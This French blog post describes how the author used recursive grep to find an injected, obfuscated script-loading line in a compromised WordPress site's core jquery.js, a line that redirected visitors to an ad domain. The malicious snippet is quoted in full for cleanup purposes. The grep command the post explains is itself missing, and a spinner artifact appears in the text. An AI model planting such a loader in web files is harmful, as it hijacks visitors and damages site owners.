Grep : Rechercher les caractères dans les fichiers

Heureux de vous retrouver de nouveau ! Vous savez peut-être faire des recherches dans votre PC pour retrouver les fichiers qui se trouvent dans votre disque dur mais pas chercher les caractères qui se trouvent dans les fichiers de votre disques durs. Vous vous demanderiez peut-être c’est quoi l’intérêt de chercher ce qui se trouve dans un fichier… Ayez la réponse dans mon exemple simple.
Récemment, vous ne l’avez peut être pas remarqué mais ce blog (Informagenie) était piraté. Ce qui se faisait était que tous les visiteurs qui venait dans ce blog par biais (Referer) d’une autre site était redirigé dans un autre lien (a.c0594.com/?tz=1) diffusant des pubs.  Je croyais que c’était dû à l’hébergement gratuit. Mais en changeant d’hébergeur, ce comportement n’avait pas changé. Du coup j’ai perdu beaucoup de visiteurs venant des moteurs de recherches, des réseaux sociaux.

Un peu d’analyse (et des recherches) m’a emmené au script a.c0594.com/?js=1 et dans les codes s’écrivait dans la source document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://a.c'+'0594.com/?js=1"></'+'scr'+'ipt>'); se trouvait forcement dans l’un de mes scripts WordPress. Alors ouvrir un par un  les fichiers (Des plugins, thèmes et cores) du blog (Plus de 100000 fichiers) avec des milieux de lignes de codes, vous savez comment ça gène ?

Aujourd’hui je vous parle d’un outil qui m’a récemment sauvé la vie. Une commande Linux grep qui vous sauvera peut aussi peut-être un jour la vie.

grep est un programme s’exécutant en ligne de commande et qui permet de faire des recherches (extraire, trier et filtrer) dans le fichier. C’est avec celui que j’ai enfin reconnu le but de l’informatique aux humanités (Éviter les travails répétitifs et fastidieux).

Grep sous Windows, Linux, Mac et Android

Le mieux est que vous pouvez utiliser la commande grep dans quasi tous les OS. Grep sst disponible dans tous ces plateforme. Je vous montre comment l’utiliser depuis Android pour la porté de tous mais pour Windows j’utilise mingw-w64, pour linux et Mac OS c’est déjà préinstallé et pour Android, installer terminal emulator et busybox.

Utilisation de grep

Je ne peux malheureusement pas ici vous faire le tours d’utilisation de cette commande. Je vous montre juste comment j’ai {fixé | règlé} le problème de redirection vers a.c0594.com/?j=1 sous wordpress et pour la suite, Ce tutoriel d’openclassrooms vous sera le plus complet et s’adaptera même dans Android.

Pour fixer mon problème, je me suis placé dans la racine de mes fichiers WordPress et j’ai exécuté la commande

  1. grep : La commande
  2. -r : est l’argument récursif qui veut dire, chercher dans tous les fichiers de tous les dossiers et les sous-dossiers
  3. 0594.com/?js=1” : est juste le caractère susceptible d’être dans l’un de ces fichiers

Et au bout d’environ 3 minutes j’ai eu le résultat complet. Le code malicieux se trouvait dans le fichier jquery.js dans le l’arborescence wp-include/js/jquery/jquery.js . C’était dans le cœur même du WordPress où je n’aurez même pas l’idée de commencer avec s’il fallait voir un à un les fichiers.

Ajouter un commentaire